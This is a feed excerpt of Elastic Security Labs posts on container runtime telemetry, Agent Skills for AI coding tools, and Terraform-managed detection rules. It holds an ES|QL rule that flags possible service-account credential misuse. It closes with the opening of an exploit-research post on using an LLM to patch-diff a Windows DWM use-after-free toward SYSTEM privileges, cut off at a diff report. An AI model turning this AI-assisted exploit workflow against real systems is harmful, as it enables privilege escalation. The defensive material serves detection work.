<p>In privileged containers, processes often expose a broad set of effective capabilities, including highly sensitive ones such as <code>CAP_SYS_ADMIN</code>, <code>CAP_SYS_MODULE</code>, <code>CAP_SYS_PTRACE</code>, <code>CAP_SYS_RAWIO</code>, and <code>CAP_BPF</code>. The presence of these capabilities significantly changes the risk profile of any executed command, as they enable actions that can directly impact the host kernel or other workloads.</p>
<p>From a detection engineering perspective, this context is critical. It allows detections to move beyond simple process-name matching and instead reason about <em>impact</em>. The same binary execution can have vastly different implications depending on whether it runs with a minimal capability set or with near-host-level privileges.</p>
<p>In practice, capability data enables detection engineers to:</p>
<ul>
<li>Identify suspicious tooling executed inside overly permissive containers.</li>
<li>Correlate runtime behavior with dangerous capability combinations.</li>
<li>Prioritize alerts based on actual exploitation potential rather than surface-level activity.</li>
</ul>
<p>This becomes especially relevant to container breakout research, where the presence or absence of specific capabilities often determines whether an exploit is viable.</p>
<h4>Interactive execution</h4>
<p>The <code>process.interactive</code> field indicates whether a process is associated with an interactive session. In container environments, interactive execution is relatively rare for production workloads and often correlates strongly with post-compromise or hands-on-keyboard activity.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image4.png" alt="Figure 18: Defend for Containers’ important process.*.interactive fields overview" title="Figure 18: Defend for Containers’ important `process.*.interactive` fields overview" /></p>
<p>Defend for Containers exposes interactivity not only at the process level, but also across related execution contexts, including <code>process.parent.interactive</code>, <code>process.entry_leader.interactive</code>, and <code>process.session_leader.interactive</code>. This makes it possible to determine whether an entire execution chain is interactive, rather than relying on a single process flag in isolation.</p>
<p>Common examples of interactive execution within containers include spawning a <code>bash</code> or <code>sh</code> shell, running interactive utilities such as <code>curl</code>, <code>kubectl</code>, or <code>busybox</code>, or operator-driven reconnaissance within a compromised Pod. While these actions may be legitimate during debugging, they are uncommon in steady-state production workloads.</p>
<p>When combined with container image, namespace, and privilege context, interactive execution becomes a strong anomaly signal. It allows detection logic to distinguish between expected automated container behavior and activity more consistent with manual intervention or attacker-driven exploration.</p>
<h3>File events</h3>
<p>Defend for Containers file events capture filesystem activity inside containers, and are emitted for a variety of operations. Unlike traditional file integrity monitoring, these events are runtime-aware and scoped to container workloads, providing context about <em>how</em> and <em>why</em> file changes occur.</p>
<p>Defend for Containers can detect file activity such as file opens <strong>with write intent</strong>, content modifications, file creations, renames, permission changes, and deletions. By focusing on write-oriented operations, Defend for Containers emphasizes behavior that alters system state rather than passive file access.</p>
<p>This allows detection engineers to reason about file usage patterns at runtime, not just the result of a change.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image6.png" alt="Figure 19: Defend for Containers’ important file events overview" title="Figure 19: Defend for Containers’ important `file` events overview" /></p>
<p>Several fields are particularly important when building file-based detections. The <code>file.path</code> and <code>file.name</code> fields identify the affected file and its location, while <code>file.extension</code> can help distinguish binaries, scripts, and configuration files. The <code>event.action</code> and <code>event.type</code> fields describe what operation occurred and how it should be interpreted in the event lifecycle.</p>
<p>Together, these fields allow Defend for Containers to distinguish benign file access from suspicious modification patterns, such as writing binaries or changing permissions within sensitive directories.</p>
<h3>Bringing it together</h3>
<p>As with any other data source, Defend for Containers telemetry becomes truly valuable once you understand how to combine fields across the process, file, container, and orchestration domains. Rather than relying on static indicators, Defend for Containers enables detection engineering based on runtime behavior, privilege context, and workload identity.</p>
<h2>Conclusion</h2>
<p>Defend for Containers in Elastic Stack 9.3.0 includes container runtime detection as a core component of Linux detection engineering. It features a clear scope, a policy-driven configuration model, and runtime telemetry designed specifically for containerized workloads.</p>
<p>In this post, we examined how to deploy Defend for Containers, how its policy model is structured, and how runtime events are generated and enriched with container and orchestration context. We explored the structure of process and file events, capability metadata, interactive execution signals, and container-specific fields that allow detections to be expressed in a workload-aware manner.</p>
<p>The key takeaway is that effective container detection requires reasoning about runtime behavior in context: processes, file modifications, privileges, and workload identity must be evaluated together. Defend for Containers provides the necessary telemetry to make that possible.</p>
<p>In the next article, we will build on this foundation by walking through a realistic container attack scenario and demonstrating how Defend for Containers telemetry surfaces each stage of compromise in practice.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/getting-started-with-defend-for-containers.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Get started with Elastic Security from your AI agent]]></title>
            <link>https://www.elastic.co/kr/security-labs/agent-skills-elastic-security</link>
            <guid>agent-skills-elastic-security</guid>
            <pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Go from zero to a fully populated Elastic Security environment without leaving your IDE, using open source Agent Skills.]]></description>
            <content:encoded><![CDATA[<h2>Get started with Elastic Security from your AI agent</h2>
<p><a href="https://github.com/elastic/agent-skills/tree/main">Elastic Agent Skills</a> are open source packages that give your AI coding agent native Elastic expertise. If you're already using <a href="https://www.elastic.co/kr/security-labs/from-alert-fatigue-to-agentic-response">Elastic Agent Builder</a>, you get AI agents that work natively with your security data. Agent Skills are for the other side: bringing that same Elastic Security knowledge to the external AI tools your team already uses, like Cursor, Claude Code, or GitHub Copilot.</p>
<p>If you use an AI coding agent and want to evaluate Elastic Security, or you're a security team that wants to get up and running with Elastic Security fast without navigating setup docs, these are for you. Today we're shipping security skills that take you from zero to a fully populated Elastic Security environment, without leaving your integrated development environment (IDE).</p>
<p>Before you dive in, note that this is a v0.1.0 release. Also, review <a href="https://github.com/elastic/agent-skills/blob/main/README.md">this documentation</a> for steps to get started and important security considerations.</p>
<h3>Step 1: Create a security project</h3>
<p>You open your AI coding agent and prompt: <em>Create a Security project on Elastic Cloud.</em></p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/cloud/create-project"><code>create-project</code></a> skill provisions an Elastic Cloud Serverless Security project via the Elastic Cloud API, handles credentials securely, and hands you back your Elasticsearch and Kibana URLs.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image1.png" alt="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." title="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." /></p>
<p>Elastic Cloud Serverless supports regions across Amazon Web Services (AWS), Google Cloud Platform (GCP), and Azure, so you can pick whichever fits your environment.</p>
<p>One prompt. Project ready.</p>
<h3>Step 2: Generate sample data</h3>
<p>An empty Elastic Security project isn't very convincing. No alerts, no timelines, no process trees. You need data, but you don't always want to enable real sources of data before you've had a chance to explore.</p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/generate-security-sample-data"><code>generate-security-sample-data</code></a> skill populates your project with realistic, Elastic Common Schema–compliant (ECS-compliant) security events and synthetic alerts across four attack scenarios:</p>
<ul>
<li><strong>Windows ransomware chain:</strong> Word macro to PowerShell to ransomware deployment, complete with process trees that light up the Analyzer view.</li>
<li><strong>Credential access:</strong> LSASS memory dumps and credential harvesting.</li>
<li><strong>AWS cloud privilege escalation:</strong> IAM policy manipulation and unauthorized access key creation.</li>
<li><strong>Okta identity attack:</strong> Multifactor authentication (MFA) factor deactivation and suspicious authentication patterns.</li>
</ul>
<p>These aren't random events. Every alert maps to <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/mitre-attandckr-coverage"><strong>MITRE ATT&amp;CK</strong></a> techniques. Process trees have proper entity IDs so the <strong>Analyzer</strong> renders real parent-child relationships. <strong>Attack Discovery</strong> picks up the correlated threat narratives. You get the experience of a live environment without needing one.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image4.png" alt="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." title="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." /></p>
<p>When you're done exploring, ask your AI coding agent to remove the sample data. All sample events, alerts, and cases are cleaned up without affecting the rest of your environment.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image2.png" alt="Terminal output confirming that sample events, alerts, and cases have been removed." title="Terminal output confirming that sample events, alerts, and cases have been removed." /></p>
<h3>Step 3: What's next after sample data</h3>
<p>Once your environment is populated, the same AI coding agent can help you work with it. We're also shipping skills for <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/alert-triage"><strong>alert triage</strong></a> (fetch and investigate alerts, classify threats, and acknowledge alerts), <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/detection-rule-management"><strong>detection rule management</strong></a> (find noisy rules, add exceptions, and create new coverage), and <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/case-management"><strong>case management</strong></a> (create and track security operations center [SOC] cases and link alerts to incidents).</p>
<h3>Why skills, not just docs?</h3>
<p>Elastic's API documentation is <a href="https://www.elastic.co/kr/docs/api/">public</a>. Your AI agent can already read it. So why do skills matter?</p>
<p>Skills matter because docs describe individual endpoints and encode workflows. There's a real gap between knowing that <code>POST /api/detection_engine/signals/search</code> exists and knowing that you need to fetch the oldest unacknowledged alert, query the process tree and related alerts within a five-minute window of the trigger time, check for an existing case before creating a new one, attach the alert with its rule UUID, and then acknowledge all related alerts on the same host, in that order, with the right field names, across three different APIs.</p>
<p>Skills also encode what <em>not</em> to do: Never display credentials in chat, confirm before creating billable resources, and handle Serverless-specific API quirks. This is the expert knowledge that turns a general-purpose AI agent into one that actually knows Elastic.</p>
<h3>Get started</h3>
<p>All <a href="https://github.com/elastic/agent-skills">skills</a> are open source and work with any supported AI coding agent:</p>
<ul>
<li>Cursor</li>
<li>Claude Code</li>
<li>GitHub Copilot</li>
<li>Windsurf</li>
<li>Cline</li>
<li>OpenCode</li>
<li>Gemini CLI</li>
</ul>
<p>Open a terminal in your project workspace and run:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image3.png" alt="Code line: npx skills add elastic/agent-skills." title="Code line: npx skills add elastic/agent-skills" /></p>
<p>Or install specific skills:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/image5.png" alt="Code lines to add specific skills." title="Code lines to add specific skills." /></p>
<p>Check out the full catalog at <a href="https://github.com/elastic/agent-skills">github.com/elastic/agent-skills</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/agent-skills-elastic-security/agent-skills-elastic-security.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Managing Elastic Security Detection Rules with Terraform]]></title>
            <link>https://www.elastic.co/kr/security-labs/managing-rules-with-terraform</link>
            <guid>managing-rules-with-terraform</guid>
            <pubDate>Fri, 13 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn to define and deploy Elastic Security detection rules and exceptions using the Elastic Stack Terraform Provider vs detection-rules repository DaC capabilities.]]></description>
            <content:encoded><![CDATA[<p>At the core of Elastic Security lie <a href="https://www.elastic.co/kr/blog/elastic-security-detection-engineering">outstanding detection capabilities</a>, allowing users to <a href="https://www.elastic.co/kr/blog/elastic-security-building-effective-threat-hunting-detection-rules">create</a>, test, tune, manage, deploy detection rules, as code, in their environments. The ability to create robust detections is critical for Security Operations as detection logic elevates threat signal from the telemetry noise.</p>
<p>This article highlights how Elastic's new Terraform resources for security detection rules and exceptions expand practitioners' capabilities for detection-as-code deployment. Below you will find examples of defining and deploying your detection artifacts in Elastic Security with Terraform. We will also show how you can use Elastic's AI Agent to help quickly create the Terraform configuration for your custom rules. Finally, it also provides guidance on when to use the Elastic Stack Terraform <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">provider</a> versus <a href="https://github.com/elastic/detection-rules/blob/main/README.md#detections-as-code-dac">tools from the detection-rules repository</a>.</p>
<h2>Managing Elastic with Terraform</h2>
<p><a href="https://developer.hashicorp.com/terraform">Terraform is</a> a tool created by HashiCorp (now IBM) to manage infrastructure in the cloud, or in self-managed environments, as code. With a simple stroke of HCL (HashiCorp configuration language), users can define the desired state of their cloud provider infrastructure, application, configuration, and in Elastic’s case, cluster settings, configuration, indices or streams, and now also detection rules and alerts, as fully configurable, traceable, and reviewable code in your favorite source management tool.</p>
<p>The <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Elastic Stack Terraform provider</a> helps search, observability, and security professionals, as well as DevOps and SREs, configure their Elastic clusters with the right indices and mappings for their search use cases, SLOs or Fleet policies for their observability use case, and now, detection rules, alerts, and exceptions for their security use case. It can easily configure those, and many more objects and settings in the Elastic Stack.</p>
<h2>Security Detection rules - now as code with Terraform</h2>
<p>With <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.12.0">V0.12.0</a> and <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.13.0">V0.13.0</a> of the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Elastic Stack Terraform provider,</a> users can now manage their Detection rules and rule exceptions using Terraform. This is especially useful for users who have already been managing their Elastic deployments with Terraform and want to extend it to Detection rules.</p>
<h3>Using the Elastic Stack Terraform Provider to deploy Rules and Exceptions</h3>
<p>Let's look at an example of using the Elastic Stack Terraform Provider to deploy an Elastic Security Rule. In this example, we want to detect Windows Service Accounts that are performing an interactive logon on a host.</p>
<p>Service accounts typically have elevated privileges and rarely-rotated passwords, making them high-value targets for attackers. Since these accounts should only perform automated service logons, an interactive logon can indicate credential theft or misuse.</p>
<p>The first thing we need to think of is what telemetry we need to see which logons are happening on our host. <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624">Logon events</a> are logged by the Windows Local Security Authority Subsystem Service (LSASS) whenever a logon session is successfully created on the machine. We can pick this up via an Elastic Agent with the <a href="https://www.elastic.co/kr/docs/reference/integrations/windows">Windows Integration</a> installed.</p>
<p>The data will be written by the Elastic Agent into the system.security Data Stream, we can match it with this index pattern: <code>logs-system.security-*.</code> We also know that Logon events generate event code <code>4624</code> and that, in our example, the service account name starts with <code>svc</code> or ends with <code>$</code>.  In addition, an interactive login will have a logon type of <code>interactive</code>.</p>
<p>So, we can match these events with an <a href="https://www.elastic.co/kr/docs/reference/query-languages/esql">ES|QL</a> rule like:</p>
<pre><code class="language-sql">FROM logs-system.security-\*  
| WHERE event.code \== &quot;4624&quot; AND (user.name LIKE &quot;svc\_\*&quot; OR user.name LIKE &quot;svc-\*&quot;  
     OR user.name LIKE &quot;\*\_svc&quot; OR user.name LIKE &quot;\*$&quot;)  
     AND winlog.logon.type IN (&quot;Interactive&quot;, &quot;RemoteInteractive&quot;,  
         &quot;CachedInteractive&quot;, &quot;CachedRemoteInteractive&quot;)  
</code></pre>
<p>There may be situations where we don't want this rule to run, for example, if there is a legacy application that we want to permit interactive logons from. So, we can create an <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/rule-exceptions">Exception Item</a>, like: <code>user.name IS svc\_sqlbackup</code>.</p>
<p>Now that we know what we want the Rule and its Exceptions to look like, we can use the Terraform provider's <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">elasticstack_kibana_security_detection_rule</a>, <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_exception_list">elasticstack_kibana_security_exception_list</a>, and <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_exception_item">elasticstack_kibana_security_exception_item</a> resources to define them in code.</p>
<p>Turning ES|QL rules into Terraform's configuration syntax, <a href="https://developer.hashicorp.com/terraform/language/syntax/configuration">HCL</a>, is a great use case for Elastic's <a href="https://www.elastic.co/kr/docs/solutions/security/ai/agent-builder/agent-builder">AI Agent</a>.<br />
Elastic AI Agent capabilities help accelerate security operations across a wide range of tasks - from <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">alerts triage and incident response</a> to helping with detection lifecycle tasks.</p>
<p>Simply open AI Agent, and ask it to create Terraform configurations based on your query and exceptions.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/image2.png" alt="" /></p>
<p>You should end up with something like this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/image1.png" alt="" /></p>
<p>Here's a closer look at the code.</p>
<p>There are a few elements to call out specifically:</p>
<ul>
<li><code>type</code>: The type of exception list. For example: detection, endpoint, or endpoint_trusted_apps</li>
<li><code>namespace_type</code>: Determines whether the exception list is available in all Kibana spaces or just the single space in which it was created.</li>
</ul>
<pre><code>resource &quot;elasticstack_kibana_security_exception_list&quot; &quot;svc_account_interactive_login&quot; {
  list_id        = &quot;svc-account-interactive-login-exceptions&quot;
  name           = &quot;Service Account Interactive Login Exceptions&quot;
  description    = &quot;Documented exceptions for service accounts that legitimately require interactive logon&quot;
  type           = &quot;detection&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;service-accounts&quot;,&quot;windows&quot;,&quot;authentication&quot;]
}  
</code></pre>
<p>This creates a new exception list.</p>
<p>Of note, the <code>entries</code> array contains the conditions under which the exception applies.</p>
<pre><code>resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;svc_sqlbackup&quot; {
  list_id        = elasticstack_kibana_security_exception_list.svc_account_interactive_login.list_id
  item_id        = &quot;svc-sqlbackup-exception&quot;
  name           = &quot;svc_sqlbackup - Legacy SQL Backup Agent&quot;
  description    = &quot;Approved exception: Legacy SQL backup agent requires interactive logon per vendor documentation.&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;sql&quot;,&quot;backup&quot;,&quot;approved&quot;]
entries = [
    {
      field    = &quot;user.name&quot;
      type     = &quot;match&quot;
      operator = &quot;included&quot;
      value    = &quot;svc_sqlbackup&quot;
    }
  ]
} 
</code></pre>
<p>This adds our exception: that we don't want the rule to run if the username is <code>svc\_sqlbackup</code>.</p>
<p>Of note, the elements from <code>enabled</code> to the <code>technique</code> array are examples of the other properties that can be set on a rule.</p>
<pre><code>resource &quot;elasticstack_kibana_security_detection_rule&quot; &quot;svc_account_interactive_login&quot; {
  name        = &quot;Service Account Interactive Login&quot;
  description = &lt;&lt;-EOT
    Detects interactive logins by service accounts. Service accounts should authenticate
    via service (Type 5) or batch (Type 4) logon types, not interactively. Interactive
    logins by service accounts may indicate credential theft or misuse.

    This rule identifies service accounts by common naming conventions (svc_*, svc-*,
    *_svc) and managed service accounts (*$).
  EOT

  type     = &quot;esql&quot;
  language = &quot;esql&quot;
  query    = &lt;&lt;-EOT
    FROM logs-system.security-* metadata _id, _version, _index
    | WHERE event.code == &quot;4624&quot;
      AND (user.name LIKE &quot;svc_*&quot; OR user.name LIKE &quot;svc-*&quot; OR user.name LIKE &quot;*_svc&quot; OR user.name LIKE &quot;*$&quot;)
      AND winlog.logon.type IN (&quot;Interactive&quot;, &quot;RemoteInteractive&quot;, &quot;CachedInteractive&quot;, &quot;CachedRemoteInteractive&quot;)
    | KEEP @timestamp, host.name, user.name, user.domain, winlog.logon.type, source.ip, _id, _version, _index
  EOT

  enabled    = true 
  severity   = &quot;high&quot;
  risk_score = 73

  from     = &quot;now-6m&quot;
  to       = &quot;now&quot;
  interval = &quot;5m&quot;

  author  = [&quot;Security Team&quot;]
  license = &quot;Elastic License v2&quot;
  tags    = [
    &quot;Domain: Endpoint&quot;,
    &quot;OS: Windows&quot;,
    &quot;Use Case: Identity and Access Audit&quot;,
    &quot;Tactic: Initial Access&quot;,
    &quot;Data Source: Windows Security Event Log&quot;
  ]

  false_positives = [
    &quot;Service accounts with documented exceptions that require interactive logon&quot;,
    &quot;Break-glass procedures during incident response&quot;,
    &quot;Initial service account configuration or troubleshooting&quot;
  ]

  references = [
    &quot;https://learn.microsoft.com/en-us/entra/architecture/service-accounts-on-premises&quot;,
    &quot;https://blog.quest.com/10-microsoft-service-account-best-practices/&quot;,
    &quot;https://attack.mitre.org/techniques/T1078/002/&quot;
  ]

  threat = [
    {
      framework = &quot;MITRE ATT&amp;CK&quot;
      tactic = {
        id        = &quot;TA0001&quot;
        name      = &quot;Initial Access&quot;
        reference = &quot;https://attack.mitre.org/tactics/TA0001/&quot;
      }
      technique = [
        {
          id        = &quot;T1078&quot;
          name      = &quot;Valid Accounts&quot;
          reference = &quot;https://attack.mitre.org/techniques/T1078/&quot;
          subtechnique = [
            {
              id        = &quot;T1078.002&quot;
              name      = &quot;Domain Accounts&quot;
              reference = &quot;https://attack.mitre.org/techniques/T1078/002/&quot;
            }
          ]
        }
      ]
    }
  ]

  exceptions_list = [
    {
      id             = elasticstack_kibana_security_exception_list.svc_account_interactive_login.id
      list_id        = elasticstack_kibana_security_exception_list.svc_account_interactive_login.list_id
      namespace_type = elasticstack_kibana_security_exception_list.svc_account_interactive_login.namespace_type
      type           = elasticstack_kibana_security_exception_list.svc_account_interactive_login.type
    }
  ]
}
</code></pre>
<p>Finally, we define the rule, including the ES|QL query we provided earlier and MITRE ATT&amp;CK classification.</p>
<p>You can add these resource definitions into one configuration file (perhaps security-rules.tf), add it to your <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs#kibana">configured</a> Elastic Stack terraform directory, and then run the `terraform apply` command and parameter to deploy the Rule.</p>
<pre><code class="language-shell">terraform apply --auto-approve
</code></pre>
<p>Since <code>terraform apply</code> runs a plan before making changes, it will automatically detect if anyone has edited a rule directly in Kibana and show you exactly what drifted: no manual exports or diffs needed.</p>
<p>After Terraform has made the changes, we can see the Rule in Kibana:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/image5.png" alt="" /></p>
<p>We can also see the Exception List:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/image4.png" alt="" /></p>
<p>This way, you can define your detections in Terraform and benefit from automatic deployment along with other objects you manage with Terraform.</p>
<h2>Terraform workspaces for multi-space Elastic deployments</h2>
<p>Terraform uses a concept called “<a href="https://developer.hashicorp.com/terraform/language/state/workspaces">workspaces</a>” allowing you to reuse the same infrastructure code for multiple deployments, for example, a dev, testing, and production environment. This concept is useful for managing rules across multiple deployments and/or Kibana spaces.</p>
<h2>Managing detections with Terraform and Detections as code</h2>
<p>Elastic also has <a href="https://www.elastic.co/kr/security-labs/detection-as-code-timeline-and-new-features">Detections as Code functionality</a> available via our open <a href="https://github.com/elastic/detection-rules">detection-rules repository.</a></p>
<p>The two tools have complementary strengths and are aligned with different user profiles and workflow stages for implementing Detections as Code.</p>
<h3>Detection as Code features in detection-rules</h3>
<ul>
<li><strong>Best fit user profile</strong>: Detection engineers</li>
<li><strong>Intended workflow phase</strong>: Rule authoring and validation</li>
</ul>
<p>With dual-sync between your GitHub repo and Kibana, linting, schema validation, and unit-testing, detection-rules functionality is well-suited to experienced Detection Engineers comfortable with Git-based version control.</p>
<h3>Elastic Stack Terraform Provider</h3>
<ul>
<li><strong>Best fit user profile</strong>: DevOps engineers / Platform teams</li>
<li><strong>Intended workflow phase</strong>: Deployment and operations</li>
</ul>
<p>For users already using Terraform to manage their Elastic clusters, the Terraform Provider is a great fit, bringing consistency to all &quot;x-as-code&quot; operations and familiar state management and parameterization.</p>
<p>The key differences and optimal use cases for each tool are detailed in the comparison table below:</p>
<table>
<thead>
<tr>
<th align="left">Workflow Stage</th>
<th align="left">detection-rules</th>
<th align="left">Terraform Provider</th>
<th align="left">Best Fit</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Rule Authoring</strong></td>
<td align="left">Purpose-built tooling: create-rule wizard, TOML schema, KQL/EQL validation, field checks against ECS, Kibana-to-code export.</td>
<td align="left">Standard HCL definitions; teams integrate their preferred validation tooling into existing pipelines.</td>
<td align="left"><strong>detection-rules:</strong> Detection engineers authoring and refining rules daily. Teams wanting to automatically convert rules from Kibana into code. <strong>Terraform:</strong> Teams already using Terraform in their workflows, or teams wanting to automate and deploy detection rules as code, but without an established CI/CD platform.</td>
</tr>
<tr>
<td align="left"><strong>Testing &amp; Validation</strong></td>
<td align="left">Built-in unit testing framework, schema validation, query validation, configurable test suites.</td>
<td align="left">Terraform tests for optional unit testing. No built-in query validation: the provider relies on the Kibana API to accept or reject rule definitions at apply time.</td>
<td align="left"><strong>detection-rules:</strong> Teams wanting out-of-the-box detection testing. <strong>Terraform:</strong> Platform teams managing rules as part of broader IaC with existing validation pipelines. Teams happy to write custom tests in Terraform.</td>
</tr>
<tr>
<td align="left"><strong>Exception Management</strong></td>
<td align="left">Native exception list handling; export/import with rules, TOML storage, and rule linking.</td>
<td align="left">Exception lists can be referenced via rule attributes.</td>
<td align="left"><strong>detection-rules:</strong> Teams managing exceptions as part of detection content. <strong>Terraform:</strong> Teams managing exceptions as separate infrastructure resources.</td>
</tr>
<tr>
<td align="left"><strong>Governance &amp; Drift Management</strong></td>
<td align="left">VCS-based with dual sync: push rules from repo to Kibana and export from Kibana back to repo, allowing either to serve as the source of truth. Drift detection is achievable with custom export-and-diff tooling.</td>
<td align="left">VCS-authoritative: state file enforces declared configuration.  Native drift detection: Terraform plan surfaces any out-of-band changes made in Kibana.</td>
<td align="left"><strong>detection-rules:</strong> Teams comfortable with Git-based workflows and flexible sync models. <strong>Terraform:</strong> Organisations requiring formal state reconciliation and audit trails.</td>
</tr>
<tr>
<td align="left"><strong>Rollback</strong></td>
<td align="left">Git history provides version control; re-import previous versions from the repo.</td>
<td align="left">Revert HCL configuration in Git and re-apply to restore the previous state.</td>
<td align="left"><strong>detection-rules:</strong> Teams using Git-centric recovery workflows. <strong>Terraform:</strong> Organisations with standardised rollback mechanisms across infrastructure and rulesets.</td>
</tr>
<tr>
<td align="left"><strong>Parameterisation &amp; Templating</strong></td>
<td align="left">Achievable with external preprocessing (Jinja2, etc.) before import.</td>
<td align="left">Native HCL features: variables, locals, for_each, dynamic blocks, and modules.</td>
<td align="left"><strong>detection-rules:</strong> Teams not requiring parameterisation or with existing templating solutions.  <strong>Terraform:</strong> Teams wanting native IaC parameterisation.</td>
</tr>
<tr>
<td align="left"><strong>Operational Integration</strong></td>
<td align="left">Focused tooling optimised for detection engineering workflows.</td>
<td align="left">Unified control plane managing detection rules alongside cloud infrastructure, network policies, and other security tooling.  Integrates with other resources that may be required by detections such as external connectors.</td>
<td align="left"><strong>detection-rules:</strong> Specialist detection teams. More flexible if dual-sync (Kibana and repo are both sources of truth).  <strong>Terraform:</strong> Platform teams managing Elastic as part of broader infrastructure.</td>
</tr>
</tbody>
</table>
<p>In short, Detection Engineers are better served by the specialized creation and testing tools provided in the <code>detection-rules</code> repository, while DevOps/Platform Teams should use the Terraform provider to manage detection rules as part of their broader infrastructure-as-code strategy for deployment and operations.</p>
<h2>Try it out</h2>
<p>To experience the full benefits of what Elastic has to offer for detection engineers, upgrade to 9.3 or start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a>. Visit <a href="https://www.elastic.co/kr/security">elastic.co/security</a> to learn more and get started.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/managing-rules-with-terraform.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Patch diff to SYSTEM]]></title>
            <link>https://www.elastic.co/kr/security-labs/patch-diff-to-system</link>
            <guid>patch-diff-to-system</guid>
            <pubDate>Fri, 06 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Leveraging LLMs and patch diffing, this research details a Use-After-Free vulnerability in Windows DWM, demonstrating a reliable exploit that achieves escalation from low-privileged user permissions to SYSTEM.]]></description>
            <content:encoded><![CDATA[<h2>Intro</h2>
<p>Patch diffing has long fascinated me. I think part of it has to do with the race against the clock, reversing, exploiting, and trying to attain that “1day” exploit status. For advanced Windows targets, Valentina Palmiotti and Ruben Boonen <a href="https://www.ibm.com/think/x-force/patch-tuesday-exploit-wednesday-pwning-windows-ancillary-function-driver-winsock">proved</a> that this was already possible nearly 3 years ago. But, they are some of the world's most talented exploit devs. Can LLMs raise the capability floor for us mere mortals? Fortunately, and maybe a bit alarmingly, the answer is yes.</p>
<h2>The Hunt</h2>
<p>When the bulletin for the January 2026 Patch Tuesday dropped, I kicked off my search to identify one of the patched vulnerabilities, and (hopefully) develop a working exploit for it. Top on the <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jan">target list</a> were any vulnerabilities already known to be exploited in the wild. January patches included an in-the-wild information leak <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-20805">vulnerability</a> in Desktop Window Manager (DWM), which caught my eye. It also included a second DWM vulnerability which could lead to local privilege escalation. Historically, DWM has been a <a href="https://www.elastic.co/kr/security-labs/itw-windows-lpe-0days-insights-and-detection-strategies">popular target</a> for local privilege escalation. Sometimes it can be tricky to identify the exact patched component, but for DWM, dwmcore.dll is always a safe bet.</p>
<p>After training Ghidra on the files and extracting BSim vectors for every function, it becomes quite easy to highlight the differences between them. Not to mention, many Microsoft-patched vulnerabilities come alongside new feature flags. Needless to say, Opus 4.5 made quick work of the diff and identified one of the vulnerabilities within minutes.</p>
<pre><code>======================================================================
BSim PATCH DIFF REPORT
======================================================================
File 1: dwmcore_vuln.dll
File 2: dwmcore_patched.dll 
======================================================================

----------------------------------------------------------------------------------------------------
TOP 10 MOST MODIFIED FUNCTIONS
----------------------------------------------------------------------------------------------------
  dwmcore_vuln.dll                      dwmcore_patched.dll                        Sim  Jaccard
----------------------------------------------------------------------------------------------------
